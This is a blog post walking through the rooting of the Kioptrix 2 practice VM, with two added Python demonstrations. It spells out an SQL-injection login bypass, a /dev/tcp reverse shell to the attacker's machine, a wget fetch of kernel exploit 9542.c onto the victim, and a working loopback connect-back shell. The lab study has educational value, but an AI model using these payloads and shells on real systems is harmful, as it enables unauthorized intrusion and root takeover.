[VIDEO] Rooting A Box (Local Command Execution)
Posted in Security Videos | Posted on 30-08-2012
It's been a while since I last updated this blog (I've been working on some projects lately), but I had to steal some time to make this.
In this session we look at gaining root privileges on the target by way of command execution followed by a local kernel exploit.
Overview
Our target system is Kioptrix 2.
Kioptrix is a "vulnerable-by-design" OS that serves as a pentest lab where security enthusiasts can legally try out their skills, the aim being to completely compromise the machine.
The video describes a step-by-step way of going about this.
What Resources Do We Need?
* Kioptrix – Level 2 VM. Download here
* A Virtual Machine (Example: VMware Player or Virtual Box)
* Nmap – (Can be found on BackTrack 5-R2). Download here
* Firefox – (Can be found on BackTrack 5-R2)
* Linux Kernel 2.6 Root Exploit – (Can be found on exploit-db.com)
Steps
* Discover hosts on the network (Netdiscover)
* Scan the target (Nmap)
* Bypass the login screen (SQL injection)
* Start a Netcat listener on the attack machine
* Inject a bash reverse shell through the command-execution flaw
* Change to a directory the apache user can write to (cd /tmp)
* Search for a local privilege escalation exploit for Linux kernel 2.6
* Download the exploit code and host it on the attack machine
* From the reverse shell, wget the exploit code onto the victim machine
* Compile and execute the exploit
* Game over
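The login bypass in the steps above, worked as an added example that is not part of the original post or of the Kioptrix image: a constructed SQLite table stands in for the target's MySQL users table, the vulnerable query is built by string concatenation the way the bypass requires, and the page's own payload `1' or '1--` is typed as the password. The closing quote in the payload terminates the password literal and the `or '1--'` that follows is a truthy string, so the WHERE clause matches every row. The parameterized login beside it goes beyond the page and shows the fix. Table contents, passwords and function names are assumptions of the example.

```python
import sqlite3

# Constructed sample credentials standing in for the target's users table
# (test data for this example, not taken from the Kioptrix VM).
USERS = [("admin", "s3cret-admin-pw"), ("john", "hunter2")]

# The password the post types into the login form.
PAGE_PAYLOAD = "1' or '1--"


def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def build_vulnerable_query(username, password):
    """String concatenation: the pattern the login bypass relies on."""
    return (f"SELECT username FROM users WHERE username = '{username}' "
            f"AND password = '{password}'")


def login_vulnerable(username, password):
    """Returns True when the concatenated query matches at least one row.

    With PAGE_PAYLOAD the statement becomes
      ... AND password = '1' or '1--'
    i.e. (username AND password) OR '1--', and '1--' converts to the
    number 1, which is true, so every user row comes back.
    """
    conn = _db()
    try:
        return bool(conn.execute(build_vulnerable_query(username, password)).fetchall())
    finally:
        conn.close()


def login_parameterized(username, password):
    """Hardened form (not on the page): bound parameters keep the payload a
    plain string compared against the stored password, so it matches nothing."""
    conn = _db()
    try:
        rows = conn.execute(
            "SELECT username FROM users WHERE username = ? AND password = ?",
            (username, password),
        ).fetchall()
        return bool(rows)
    finally:
        conn.close()


if __name__ == "__main__":
    print(build_vulnerable_query("admin", PAGE_PAYLOAD))
    print("vulnerable login with payload:", login_vulnerable("admin", PAGE_PAYLOAD))
    print("parameterized login with payload:", login_parameterized("admin", PAGE_PAYLOAD))
```

The same shape holds for the more common `' or '1'='1` variant: anything that closes the string literal and appends a true disjunct defeats a concatenated WHERE clause, and only binding the values as parameters removes the problem.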
Commands
netdiscover -r 192.168.61.0/24
nmap 192.168.61.130 -p 1-65500 -O -sS -sV -v   // SYN scan of the port range with service and OS detection (nmap's OS-detection flag is the capital -O; a lone -o is not a valid option)
clear
firefox 192.168.61.130   // login form: User: admin, Password: 1' or '1--   (the quote closes the password literal and the OR makes the WHERE clause true)
cat index.php   // first command run through the application's command execution
nc -lvvp 4000   // on the attack machine: netcat listener on port 4000, waiting for the shell
/bin/sh 0</dev/tcp/192.168.61.128/4000 1>&0 2>&0   // injected on the target: bash's /dev/tcp connect-back in a single line; stdin comes from the socket and stdout/stderr are duplicated onto it
uname -a
whoami   // still the apache user; the objective says we should be root
cat /etc/issue
firefox www.exploit-db.com   // search for "linux kernel 2.6" and download the ip_append_data() local ring0 root exploit (9542.c)
wget 192.168.61.128/9542.c   // from the reverse shell, fetch the exploit code 9542.c onto the victim's machine
gcc 9542.c -o RootMeNow   // compile the exploit code
./RootMeNow   // run it
cat /etc/passwd
cat /etc/passwd && whoami && uname -a   // now root
cd /var/www
cd html
ls
whoami
(ASCII-art banner, not reproduced)
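The connect-back one-liner above, re-created as an added example that is not code from the original post: the "attacker" side is a listener on loopback standing in for `nc -lvvp 4000`, and the "victim" side runs /bin/sh with its stdin, stdout and stderr bound to the connected socket, which is what `0</dev/tcp/HOST/PORT 1>&0 2>&0` does in bash (fd 0 becomes the socket, then fds 1 and 2 are duplicated from fd 0, so everything the shell prints travels back over the same connection). The loopback address, the ephemeral port and the command the listener types are assumptions of the example; nothing here touches the Kioptrix VM.

```python
import socket
import subprocess
import threading


def reverse_shell_roundtrip(command="echo BACKSHELL-OK"):
    """Run the page's connect-back shell pattern against a local listener.

    Returns (text the listener received, exit status of the shell).  The
    command, the loopback address and the ephemeral port are assumptions of
    this example.
    """
    # Attacker side: the equivalent of "nc -lvvp PORT" on a free loopback port.
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    received = {}

    def attacker():
        conn, _ = listener.accept()
        chunks = []
        with conn:
            # Type a command into the shell, then tell it to quit so the
            # far end closes and recv() returns EOF.
            conn.sendall((command + "\nexit\n").encode())
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                chunks.append(data)
        received["output"] = b"".join(chunks).decode(errors="replace")

    thread = threading.Thread(target=attacker, daemon=True)
    thread.start()

    # Victim side: the socket plays fd 0, and fds 1 and 2 are pointed at the
    # same socket, mirroring   /bin/sh 0</dev/tcp/HOST/PORT 1>&0 2>&0
    # The socket must stay in blocking mode: a Python socket with a timeout
    # is non-blocking underneath and /bin/sh would fail its reads with EAGAIN.
    victim = socket.create_connection(("127.0.0.1", port))
    proc = subprocess.run(["/bin/sh"], stdin=victim, stdout=victim,
                          stderr=victim, timeout=10)
    victim.close()            # hang up: the listener sees EOF
    thread.join(timeout=10)
    listener.close()
    return received.get("output", ""), proc.returncode


if __name__ == "__main__":
    output, status = reverse_shell_roundtrip()
    print("listener received:", output.strip(), "| shell exit status:", status)
```

The order of the redirections matters in the real one-liner: `0<` must come first so that `1>&0` and `2>&0` duplicate the socket rather than the original terminal; writing `1>&0` before `0<` would leave stdout pointing at whatever fd 0 was when the shell started.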
Songs
– 07 Drive It Like You Stole It (Mindelixir Remix)
– 10 A Dream Within A Dream (Skeet Skeet Remix)
Kindly use the comment box below for feedback.
– InfosecShinobi